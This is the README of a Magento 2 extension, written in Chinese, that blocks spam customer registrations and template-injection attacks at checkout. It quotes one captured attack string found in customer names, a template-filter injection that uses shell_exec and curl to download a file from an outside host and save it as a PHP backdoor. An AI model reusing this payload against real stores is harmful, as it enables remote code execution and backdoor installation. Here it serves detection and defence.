lazerbahn / magento2-simple-antispam
M2扩展程序,用于阻止垃圾邮件客户账户创建
Requires
- php: >=7.0.0
- magento/framework: ^101.0|^102.0|^103.0|^104.0
Requires (Dev)
- composer/composer: *@dev
- phpunit/phpunit: *
This package is not auto-updated.
Last update: 2024-09-18 09:51:40 UTC
README
这是一个可定制的简单Magento 2扩展程序,用于阻止(俄语)垃圾邮件机器人创建新客户账户,并尝试通过结账时的模板参数注入来黑客攻击Magento商店。
此扩展程序基于https://github.com/Kreativsoehne/magento-2-simple-antispam,但进行了大量扩展。
警告!
此扩展程序已匆匆投入生产,可能需要开发人员对您的用途进行一些更改。这是一个针对当前黑客和垃圾邮件攻击浪潮的快速而肮脏的修补程序。
没有保证此例外将使您的商店安全!!
如果您的商店中存在类似以下订单
var this.getTemplateFilter().filter(foobar)var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.hacker.com/css/retro.css;mv${IFS%??}retro.css${IFS%??}a122.php")"
的客户名称,表明您遭受了攻击。检查pub文件夹中是否放置了新的php文件。立即删除它们,它们是后门!您想删除并重新设置整个系统!据我所知,似乎只有Apache服务器真正受到影响,因为nginx设置仅允许访问某些php文件,后门文件不在此处。尽管如此,即使是nginx服务器也会接收到php文件。因此,黑客能够将文件放置在系统中,这本身就很可怕。
这应该只发生在过时的Magento 2安装中。请立即更新!
安装
1. $ composer require lazerbahn/magento2-simple-antispam
2. $ ./bin/magento module:enable Lazerbahn_Antispam
3. $ ./bin/magento setup:upgrade
4. $ ./bin/magento setup:di:compile
5. Profit.
使用
此扩展程序非常简单。默认情况下,它不会执行注册请求或创建包含黑名单中特殊字符串的注册字段时的访客订单
您可以在“商店”->“配置”->“Lazerbahn”->“反垃圾邮件”后端中指定这些字符串。安装后,您需要在那里激活扩展程序。目前,这只会禁用账户创建部分。抱歉!
您可以根据您的需要更改整个扩展程序的行为。只需编辑此文件即可
./Plugin/Customer/Controller/Account/CreatePostPlugin.php
它的工作原理
这是一个简单的拦截插件,它将\Magento\Customer\Controller\Account\CreatePost::Execute()方法包装在一个环绕方法中。它将通过简单的迭代搜索所有指定的表单字段中的垃圾邮件内容。如果检测到没有垃圾邮件字符串,则将仅调用原始的Execute()方法。
对于访客结账,它将遍历所有地址字段,如果它发现黑名单中的字符串,则简单地清除地址。这会导致一个标准错误,即地址缺失,黑客陷入困境。
注意
此扩展程序旨在由开发人员用作框架。它非常原始,可能需要定制。当通过Composer安装时,进一步的升级将消除您的自定义设置。请确保自己编写拦截插件,不要升级或将其用作本地扩展,放置在/app/code/文件夹中。
可能将来会有一个版本,可以通过Magento管理定义黑名单字符串和表单字段。我们欢迎每一个贡献:)